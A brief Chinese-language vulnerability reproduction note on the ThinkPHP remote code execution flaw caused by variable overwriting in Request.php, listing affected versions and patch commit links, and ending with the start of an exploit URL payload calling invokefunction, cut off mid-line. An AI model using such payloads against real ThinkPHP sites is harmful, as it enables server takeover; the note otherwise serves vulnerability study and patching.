又到了闲来无事的漏洞复现时间~~~
ThinkPHP RCE漏洞是由于变量覆盖而引起的,漏洞源于可以对thinkphp/library/think/Request.php文件中的method方法可以进行变量覆盖,通过覆盖类的核心属性filter导致RCE,其攻击点较为多,有些还具有限制条件,另外该漏洞在利用上会出现一些问题。
漏洞影响范围:<= 5.0.23、<= 5.1.32。
5.0.x版本漏洞补丁下载地址:
https://github.com/top-think/framework/commit/4a4b5e64fa4c46f851b4004005bff5f3196de003
5.1.x版本漏洞补丁下载地址:
https://github.com/top-think/framework/commit/2454cebcdb6c12b352ac0acd4a4e6b25b31982e6
实战中碰到如下图片就说明是thp框架
payload:
/index.php?s=/Index/\think\app/invokefunction&function=call_user